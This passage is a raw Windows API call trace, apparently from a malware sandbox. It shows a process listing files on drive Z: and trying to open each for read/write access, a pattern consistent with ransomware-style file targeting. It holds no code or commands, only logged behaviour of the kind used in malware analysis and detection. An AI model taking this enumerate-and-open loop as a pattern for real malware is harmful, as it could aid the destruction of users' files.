(HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.383] PathFindExtensionW (pszPath="Z:\\3lJ1cmsj7wnHDKlL1.xls") returned=".xls" [0181.387] CreateFileW (lpFileName="Z:\\3lJ1cmsj7wnHDKlL1.xls" (normalized: "z:\\3lj1cmsj7wnhdkll1.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.388] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7fbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2BmDJ.odp", cAlternateFileName="")) returned 1 [0181.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.388] PathFindExtensionW (pszPath="Z:\\U2BmDJ.odp") returned=".odp" [0181.392] CreateFileW (lpFileName="Z:\\U2BmDJ.odp" (normalized: "z:\\u2bmdj.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.394] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd501, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P3XntTjRFtRk.png", cAlternateFileName="")) returned 1 [0181.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.394] PathFindExtensionW (pszPath="Z:\\P3XntTjRFtRk.png") returned=".png" [0181.397] CreateFileW (lpFileName="Z:\\P3XntTjRFtRk.png" (normalized: "z:\\p3xnttjrftrk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.399] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x58a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D2y4L1elku1D.pps", cAlternateFileName="")) returned 1 [0181.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.399] PathFindExtensionW (pszPath="Z:\\D2y4L1elku1D.pps") returned=".pps" [0181.402] CreateFileW (lpFileName="Z:\\D2y4L1elku1D.pps" (normalized: "z:\\d2y4l1elku1d.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.403] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14a5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bbqSpo4X5l6kKSSGQegr.jpg", cAlternateFileName="")) returned 1 [0181.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.403] PathFindExtensionW (pszPath="Z:\\bbqSpo4X5l6kKSSGQegr.jpg") returned=".jpg" [0181.408] CreateFileW (lpFileName="Z:\\bbqSpo4X5l6kKSSGQegr.jpg" (normalized: "z:\\bbqspo4x5l6kkssgqegr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.409] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13305, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TqvR2yMTxIsft9J01h3.m4a", cAlternateFileName="")) returned 1 [0181.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.409] PathFindExtensionW (pszPath="Z:\\TqvR2yMTxIsft9J01h3.m4a") returned=".m4a" [0181.413] CreateFileW (lpFileName="Z:\\TqvR2yMTxIsft9J01h3.m4a" (normalized: "z:\\tqvr2ymtxisft9j01h3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.414] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LtLIcHIqo8.wav", cAlternateFileName="")) returned 1 [0181.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.414] PathFindExtensionW (pszPath="Z:\\LtLIcHIqo8.wav") returned=".wav" [0181.418] CreateFileW (lpFileName="Z:\\LtLIcHIqo8.wav" (normalized: "z:\\ltlichiqo8.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.419] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaee1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eMZLYEuOXmzJe.avi", cAlternateFileName="")) returned 1 [0181.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.419] PathFindExtensionW (pszPath="Z:\\eMZLYEuOXmzJe.avi") returned=".avi" [0181.423] CreateFileW (lpFileName="Z:\\eMZLYEuOXmzJe.avi" (normalized: "z:\\emzlyeuoxmzje.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.424] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12466, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iVoyxyaCL.doc", cAlternateFileName="")) returned 1 [0181.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.424] PathFindExtensionW (pszPath="Z:\\iVoyxyaCL.doc") returned=".doc" [0181.429] CreateFileW (lpFileName="Z:\\iVoyxyaCL.doc" (normalized: "z:\\ivoyxyacl.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.433] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x798b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yPKKv7fQ4YK.mkv", cAlternateFileName="")) returned 1 [0181.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.433] PathFindExtensionW (pszPath="Z:\\yPKKv7fQ4YK.mkv") returned=".mkv" [0181.438] CreateFileW (lpFileName="Z:\\yPKKv7fQ4YK.mkv" (normalized: "z:\\ypkkv7fq4yk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.439] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe461, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T3PGQZ2VabtjY5.mp4", cAlternateFileName="")) returned 1 [0181.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.439] PathFindExtensionW (pszPath="Z:\\T3PGQZ2VabtjY5.mp4") returned=".mp4" [0181.443] CreateFileW (lpFileName="Z:\\T3PGQZ2VabtjY5.mp4" (normalized: "z:\\t3pgqz2vabtjy5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.444] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YMZNKV4.mkv", cAlternateFileName="")) returned 1 [0181.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.445] PathFindExtensionW (pszPath="Z:\\YMZNKV4.mkv") returned=".mkv" [0181.448] CreateFileW (lpFileName="Z:\\YMZNKV4.mkv" (normalized: "z:\\ymznkv4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.450] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11664, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppEQNd41NzmPglbQ.ppt", cAlternateFileName="")) returned 1 [0181.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.450] PathFindExtensionW (pszPath="Z:\\ppEQNd41NzmPglbQ.ppt") returned=".ppt" [0181.454] CreateFileW (lpFileName="Z:\\ppEQNd41NzmPglbQ.ppt" (normalized: "z:\\ppeqnd41nzmpglbq.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.455] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x181da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Qalr2j5fIEqdQ0.swf", cAlternateFileName="")) returned 1 [0181.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.455] PathFindExtensionW (pszPath="Z:\\4Qalr2j5fIEqdQ0.swf") returned=".swf" [0181.458] CreateFileW (lpFileName="Z:\\4Qalr2j5fIEqdQ0.swf" (normalized: "z:\\4qalr2j5fieqdq0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.459] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NZjMmNKkZjRI.png", cAlternateFileName="")) returned 1 [0181.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.460] PathFindExtensionW (pszPath="Z:\\NZjMmNKkZjRI.png") returned=".png" [0181.463] CreateFileW (lpFileName="Z:\\NZjMmNKkZjRI.png" (normalized: "z:\\nzjmmnkkzjri.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.464] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x120f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2f5wUY1aFYJTCEwR.odp", cAlternateFileName="")) returned 1 [0181.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.464] PathFindExtensionW (pszPath="Z:\\2f5wUY1aFYJTCEwR.odp") returned=".odp" [0181.468] CreateFileW (lpFileName="Z:\\2f5wUY1aFYJTCEwR.odp" (normalized: "z:\\2f5wuy1afyjtcewr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.469] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa155, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdyTR6vSlTZHl.m4a", cAlternateFileName="")) returned 1 [0181.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.469] PathFindExtensionW (pszPath="Z:\\tdyTR6vSlTZHl.m4a") returned=".m4a" [0181.474] CreateFileW (lpFileName="Z:\\tdyTR6vSlTZHl.m4a" (normalized: "z:\\tdytr6vsltzhl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.475] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GCXxiNbD.avi", cAlternateFileName="")) returned 1 [0181.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.475] PathFindExtensionW (pszPath="Z:\\GCXxiNbD.avi") returned=".avi" [0181.479] CreateFileW (lpFileName="Z:\\GCXxiNbD.avi" (normalized: "z:\\gcxxinbd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.480] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KwuGmh9JdfDxPED09.jpg", cAlternateFileName="")) returned 1 [0181.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.480] PathFindExtensionW (pszPath="Z:\\KwuGmh9JdfDxPED09.jpg") returned=".jpg" [0181.485] CreateFileW (lpFileName="Z:\\KwuGmh9JdfDxPED09.jpg" (normalized: "z:\\kwugmh9jdfdxped09.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.486] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x88b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ZwyeX1xh.doc", cAlternateFileName="")) returned 1 [0181.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.486] PathFindExtensionW (pszPath="Z:\\7ZwyeX1xh.doc") returned=".doc" [0181.491] CreateFileW (lpFileName="Z:\\7ZwyeX1xh.doc" (normalized: "z:\\7zwyex1xh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.492] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EkCDp.xls", cAlternateFileName="")) returned 1 [0181.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.492] PathFindExtensionW (pszPath="Z:\\EkCDp.xls") returned=".xls" [0181.497] CreateFileW (lpFileName="Z:\\EkCDp.xls" (normalized: "z:\\ekcdp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.498] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11ca8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p2b1gzQI.xls", cAlternateFileName="")) returned 1 [0181.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.498] PathFindExtensionW (pszPath="Z:\\p2b1gzQI.xls") returned=".xls" [0181.502] CreateFileW (lpFileName="Z:\\p2b1gzQI.xls" (normalized: "z:\\p2b1gzqi.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.504] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa169, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VF8E6ekoFe4DVWHEy.flv", cAlternateFileName="")) returned 1 [0181.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.504] PathFindExtensionW (pszPath="Z:\\VF8E6ekoFe4DVWHEy.flv") returned=".flv" [0181.508] CreateFileW (lpFileName="Z:\\VF8E6ekoFe4DVWHEy.flv" (normalized: "z:\\vf8e6ekofe4dvwhey.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 